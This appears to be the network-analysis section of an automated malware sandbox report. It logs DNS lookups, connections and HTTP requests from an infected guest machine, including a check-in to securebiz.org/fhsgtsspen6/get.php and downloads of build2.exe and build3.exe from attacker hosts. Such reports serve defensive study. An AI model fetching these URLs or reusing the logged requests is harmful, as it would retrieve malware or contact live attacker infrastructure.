Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
api.2ip.ua | 77.123.139.190 | |
mas.to | 88.99.75.82 | |
znpst.top | 14.51.96.70 | |
securebiz.org | 222.236.49.124 |
- TCP Requests
-
-
192.168.56.101:49217 179.52.22.168:80securebiz.org
-
192.168.56.101:49219 179.52.22.168:80securebiz.org
-
192.168.56.101:49218 211.119.84.112:80znpst.top
-
192.168.56.101:49203 77.123.139.190:443api.2ip.ua
-
192.168.56.101:49204 77.123.139.190:443api.2ip.ua
-
192.168.56.101:49205 77.123.139.190:443api.2ip.ua
-
192.168.56.101:49213 77.123.139.190:443api.2ip.ua
-
192.168.56.101:49214 77.123.139.190:443api.2ip.ua
-
192.168.56.101:49215 77.123.139.190:443api.2ip.ua
-
192.168.56.101:49225 88.99.75.82:443mas.to
-
192.168.56.101:49228 88.99.75.82:443mas.to
-
192.168.56.101:49229 88.99.75.82:443mas.to
-
- UDP Requests
-
-
192.168.56.101:54056 164.124.101.2:53
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:61480 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
8.8.8.8:53 192.168.56.101:54056
-
8.8.8.8:53 192.168.56.101:55450
-
8.8.8.8:53 192.168.56.101:59369
-
GET
200
http://securebiz.org/fhsgtsspen6/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true
REQUEST
RESPONSE
BODY
GET /fhsgtsspen6/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: securebiz.org
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 04:56:18 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 558
Connection: close
Content-Type: text/html; charset=UTF-8
GET
200
http://znpst.top/dl/build2.exe
REQUEST
RESPONSE
BODY
GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: znpst.top
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 04:56:50 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.6.40
Last-Modified: Wed, 22 Sep 2021 19:37:21 GMT
ETag: "b1e00-5cc9aa496e2b4"
Accept-Ranges: bytes
Content-Length: 728576
Connection: close
Content-Type: application/octet-stream
GET
200
http://securebiz.org/files/1/build3.exe
REQUEST
RESPONSE
BODY
GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: securebiz.org
HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 04:56:18 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Fri, 30 Jul 2021 22:50:56 GMT
ETag: "53c00-5c85f0d6fa061"
Accept-Ranges: bytes
Content-Length: 343040
Connection: close
Content-Type: application/x-msdownload
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts